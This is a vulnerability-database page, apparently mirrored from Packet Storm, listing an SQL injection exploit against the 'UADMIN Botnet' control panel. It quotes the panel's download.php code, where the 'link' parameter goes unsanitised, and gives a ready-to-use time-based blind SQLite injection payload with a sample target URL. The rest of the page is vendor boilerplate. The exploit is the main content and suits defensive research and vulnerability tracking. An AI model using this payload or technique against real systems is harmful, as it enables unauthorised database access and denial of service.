Lucene search
K

UADMIN Botnet SQL Injection

🗓️ 17 Mar 2020 00:00:00Reported by n4pst3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 147 Views

UADMIN Botnet SQL Injection Vulnerability - Exploit n4pst3

Code
`################################  
# Exploit Title: UADMIN Botnet - SQL Injection Vulnerability  
# Google Dork: n/a  
# Date: 16/03/2020  
# Exploit Author: n4pst3r  
# Vendor Homepage: unkn0wn  
# Software Link: unkn0wn  
# Version: unkn0wn  
# Tested on: Windows 10, Kali  
# CVE : n/a  
################################  
# Vuln-Code: download.php  
  
$link=$_GET['link'];  
$agent=esc__($_SERVER['HTTP_USER_AGENT']);  
  
if(isset($_GET['botid'])){  
$botid=esc__($_GET['botid']);  
}else{  
$botid='unknown';  
};  
  
################################  
Attack Response & PoC:  
  
---  
Parameter: link (GET)  
Type: time-based blind  
Title: SQLite > 2.0 OR time-based blind (heavy query)  
Payload: link=1' OR 7990=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- nwGY  
---  
  
http://127.0.0.1/ush/gates/token.php?link=1  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Mar 2020 00:00Current
7.4High risk
Vulners AI Score7.4
147